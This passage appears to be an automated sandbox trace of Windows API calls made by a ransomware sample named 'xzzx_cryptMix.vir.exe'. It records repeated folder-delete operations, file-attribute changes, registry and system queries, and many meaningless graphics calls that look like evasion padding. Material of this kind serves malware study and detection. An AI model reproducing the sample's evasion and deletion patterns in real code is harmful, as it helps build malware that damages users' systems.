lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18a96c, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.437] GetDC (hWnd=0x0) returned 0x301022e [0087.437] CreateCompatibleDC (hdc=0x301022e) returned 0x601022b [0087.437] GetIconInfo (in: hIcon=0x0, piconinfo=0x18eeb8 | out: piconinfo=0x18eeb8) returned 0 [0087.437] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.437] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18a768, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.437] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.437] GetDC (hWnd=0x0) returned 0x301022c [0087.437] CreateCompatibleDC (hdc=0x301022c) returned 0x6010229 [0087.437] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef30 | out: piconinfo=0x18ef30) returned 0 [0087.437] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.438] SetFileAttributesW (lpFileName="ݯ开䅠䍂", dwFileAttributes=0x20) returned 0 [0087.438] GetDC (hWnd=0x0) returned 0x301022a [0087.438] CreateCompatibleDC (hdc=0x301022a) returned 0x6010227 [0087.438] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ee68 | out: piconinfo=0x18ee68) returned 0 [0087.438] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18dec0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0087.438] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0087.438] wsprintfA (in: param_1=0x18dec0, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0087.438] SHFileOperationA (in: lpFileOp=0x18f5f4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xb50000) | out: lpFileOp=0x18f5f4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xb50000)) returned 2 [0087.506] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18dcb8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0087.506] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0087.506] wsprintfA (in: param_1=0x18dcb8, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0087.506] SHFileOperationA (in: lpFileOp=0x18f5b4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x20220000) | out: lpFileOp=0x18f5b4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x20220000)) returned 2 [0087.508] GetDC (hWnd=0x0) returned 0xb0101e8 [0087.508] CreateCompatibleDC (hdc=0xb0101e8) returned 0xe0101e5 [0087.508] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef08 | out: piconinfo=0x18ef08) returned 0 [0087.508] GetDC (hWnd=0x0) returned 0x30101e6 [0087.508] CreateCompatibleDC (hdc=0x30101e6) returned 0x60101e3 [0087.509] GetIconInfo (in: hIcon=0x0, piconinfo=0x18efe4 | out: piconinfo=0x18efe4) returned 0 [0087.509] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.509] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18dab0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0087.509] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0087.509] wsprintfA (in: param_1=0x18dab0, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0087.509] SHFileOperationA (in: lpFileOp=0x18f574*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x550000) | out: lpFileOp=0x18f574*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x550000)) returned 2 [0087.511] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.511] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18a564, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.511] SetFileAttributesW (lpFileName="ݯ瘀", dwFileAttributes=0x20) returned 0 [0087.511] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.511] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18d8a8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0087.511] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0087.511] wsprintfA (in: param_1=0x18d8a8, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0087.511] SHFileOperationA (in: lpFileOp=0x18f534*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x550000) | out: lpFileOp=0x18f534*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x550000)) returned 2 [0087.513] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.513] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18a360, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.513] GetDC (hWnd=0x0) returned 0x30101e4 [0087.513] CreateCompatibleDC (hdc=0x30101e4) returned 0x60101e1 [0087.513] GetIconInfo (in: hIcon=0x0, piconinfo=0x18efa8 | out: piconinfo=0x18efa8) returned 0 [0087.513] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.513] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18d6a0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0087.513] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0087.513] wsprintfA (in: param_1=0x18d6a0, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0087.513] SHFileOperationA (in: lpFileOp=0x18f4f4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="") | out: lpFileOp=0x18f4f4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="")) returned 2 [0087.515] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.515] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18a15c, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.515] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.515] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x189f54, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1817f4*="system32") returned 0x13 [0087.515] GetDC (hWnd=0x0) returned 0x30101e2 [0087.515] CreateCompatibleDC (hdc=0x30101e2) returned 0x60101df [0087.515] GetIconInfo (in: hIcon=0x0, piconinfo=0x18eff8 | out: piconinfo=0x18eff8) returned 0 [0087.515] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.515] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815e4 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.515] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x189d50, lpFilePart=0x181800 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x181800*="system32") returned 0x13 [0087.515] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18d7a4, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0087.516] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0087.516] wsprintfA (in: param_1=0x18d7a4, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0087.516] SHFileOperationA (in: lpFileOp=0x18f614*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xc50000) | out: lpFileOp=0x18f614*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xc50000)) returned 2 [0087.517] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.517] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x189b4c, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1817f4*="system32") returned 0x13 [0087.517] GetDC (hWnd=0x0) returned 0x30101e0 [0087.518] CreateCompatibleDC (hdc=0x30101e0) returned 0x60101dd [0087.518] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef44 | out: piconinfo=0x18ef44) returned 0 [0087.518] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.518] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x189948, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.518] GetDC (hWnd=0x0) returned 0x30101de [0087.518] CreateCompatibleDC (hdc=0x30101de) returned 0x60101db [0087.518] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef1c | out: piconinfo=0x18ef1c) returned 0 [0087.518] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.518] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x189744, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.518] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0087.518] CreateWindowExA (dwExStyle=0x0, lpClassName="BUTTON", lpWindowName="Press", dwStyle=0x80000001, X=100, Y=100, nWidth=300, nHeight=300, hWndParent=0x0, hMenu=0x0, hInstance=0x55820000, lpParam=0x0) returned 0x20130 [0087.524] ImmGetVirtualKey () returned 0xe5 [0087.524] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x30401d6 [0087.524] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x50401d3 [0087.524] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30401d4 [0087.524] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x50401d1 [0087.524] CombineRgn (hrgnDst=0x30401d4, hrgnSrc1=0x30401d6, hrgnSrc2=0x50401d3, iMode=1) returned 1 [0087.524] CombineRgn (hrgnDst=0x50401d1, hrgnSrc1=0x30401d6, hrgnSrc2=0x50401d3, iMode=4) returned 2 [0087.524] CreateSolidBrush (color=0xff) returned 0x31001d2 [0087.524] CreateSolidBrush (color=0xff0000) returned 0x51001cf [0087.524] DeleteObject (ho=0x51001cf) returned 1 [0087.524] DeleteObject (ho=0x50401d3) returned 1 [0087.524] DeleteObject (ho=0x30401d6) returned 1 [0087.524] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.525] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.525] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.525] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.578] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.578] BeginPath (hdc=0x0) returned 0 [0087.578] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.578] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.578] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.578] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.578] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.578] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.579] VirtualQuery (in: lpAddress=0x5583ef18, lpBuffer=0x180cd0, dwLength=0x1c | out: lpBuffer=0x180cd0*(BaseAddress=0x5583e000, AllocationBase=0x55820000, AllocationProtect=0x80, RegionSize=0x3000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0087.579] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.579] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.644] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x60401d3 [0087.644] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x40401d6 [0087.644] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040909 [0087.644] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104090a [0087.644] CombineRgn (hrgnDst=0x1040909, hrgnSrc1=0x60401d3, hrgnSrc2=0x40401d6, iMode=1) returned 1 [0087.644] CombineRgn (hrgnDst=0x104090a, hrgnSrc1=0x60401d3, hrgnSrc2=0x40401d6, iMode=4) returned 2 [0087.644] CreateSolidBrush (color=0xff) returned 0x61001cf [0087.644] CreateSolidBrush (color=0xff0000) returned 0x110090b [0087.644] DeleteObject (ho=0x110090b) returned 1 [0087.644] DeleteObject (ho=0x40401d6) returned 1 [0087.644] DeleteObject (ho=0x60401d3) returned 1 [0087.644] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.644] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.644] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.644] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.644] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.644] BeginPath (hdc=0x0) returned 0 [0087.644] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.644] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.645] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.645] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.645] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.645] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.645] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.645] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.645] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x50401d6 [0087.645] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x70401d3 [0087.645] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104090c [0087.645] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104090d [0087.645] CombineRgn (hrgnDst=0x104090c, hrgnSrc1=0x50401d6, hrgnSrc2=0x70401d3, iMode=1) returned 1 [0087.645] CombineRgn (hrgnDst=0x104090d, hrgnSrc1=0x50401d6, hrgnSrc2=0x70401d3, iMode=4) returned 2 [0087.645] CreateSolidBrush (color=0xff) returned 0x210090b [0087.645] CreateSolidBrush (color=0xff0000) returned 0x110090e [0087.645] DeleteObject (ho=0x110090e) returned 1 [0087.645] DeleteObject (ho=0x70401d3) returned 1 [0087.645] DeleteObject (ho=0x50401d6) returned 1 [0087.645] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.645] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.645] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.645] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.645] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.645] BeginPath (hdc=0x0) returned 0 [0087.645] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.645] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.645] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.645] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.645] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.645] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.645] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.645] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.645] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x80401d3 [0087.645] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x60401d6 [0087.645] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104090f [0087.645] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040910 [0087.646] CombineRgn (hrgnDst=0x104090f, hrgnSrc1=0x80401d3, hrgnSrc2=0x60401d6, iMode=1) returned 1 [0087.646] CombineRgn (hrgnDst=0x1040910, hrgnSrc1=0x80401d3, hrgnSrc2=0x60401d6, iMode=4) returned 2 [0087.646] CreateSolidBrush (color=0xff) returned 0x210090e [0087.646] CreateSolidBrush (color=0xff0000) returned 0x1100911 [0087.646] DeleteObject (ho=0x1100911) returned 1 [0087.646] DeleteObject (ho=0x60401d6) returned 1 [0087.646] DeleteObject (ho=0x80401d3) returned 1 [0087.646] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.646] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.646] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.646] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.646] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.646] BeginPath (hdc=0x0) returned 0 [0087.646] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.646] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.646] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.646] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.646] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.646] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.646] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.646] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.646] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x70401d6 [0087.646] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x90401d3 [0087.646] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040912 [0087.646] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040913 [0087.646] CombineRgn (hrgnDst=0x1040912, hrgnSrc1=0x70401d6, hrgnSrc2=0x90401d3, iMode=1) returned 1 [0087.646] CombineRgn (hrgnDst=0x1040913, hrgnSrc1=0x70401d6, hrgnSrc2=0x90401d3, iMode=4) returned 2 [0087.646] CreateSolidBrush (color=0xff) returned 0x2100911 [0087.646] CreateSolidBrush (color=0xff0000) returned 0x1100914 [0087.646] DeleteObject (ho=0x1100914) returned 1 [0087.646] DeleteObject (ho=0x90401d3) returned 1 [0087.646] DeleteObject (ho=0x70401d6) returned 1 [0087.646] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.646] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.646] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.646] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.646] SetDCPenColor (hdc=0x0, color=0x0) returned 